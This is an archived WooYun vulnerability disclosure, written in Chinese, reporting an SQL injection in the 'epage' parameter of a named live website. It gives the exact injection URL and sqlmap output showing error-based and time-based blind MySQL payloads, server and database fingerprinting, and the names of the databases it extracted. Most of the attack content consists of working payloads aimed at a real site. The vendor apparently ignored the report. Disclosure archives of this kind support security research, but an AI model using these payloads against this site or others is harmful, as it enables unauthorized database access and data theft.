乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-27: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开
RT
这么严重的漏洞,上个首页过分吗?
注入地址:
http://xj.lrbaba.com/index.php?comment&type=list&code=article&id=180&page=1&epage=3
注入参数是epage加单引号报错:
GET parameter 'epage' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 2098 HTTP(s) requests:---Parameter: epage (GET) Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: comment&type=list&code=article&id=180&page=1&epage=3 PROCEDURE ANALYSE(EXTRACTVALUE(7294,CONCAT(0x5c,0x71787a7a71,(SELECT (CASE WHEN (7294=7294) THEN 1 ELSE 0 END)),0x717 Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: comment&type=list&code=article&id=180&page=1&epage=3 PROCEDURE ANALYSE(EXTRACTVALUE(6825,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x66754441))))),1)---[15:28:59] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.1[15:28:59] [INFO] fetching database names[15:29:00] [INFO] the SQL query used returns 2 entries[15:29:00] [INFO] retrieved: information_schema[15:29:00] [INFO] retrieved: xjlrbabaavailable databases [2]:[*] information_schema[*] xjlrbaba
数据库:
成员信息:
未能联系到厂商或者厂商积极拒绝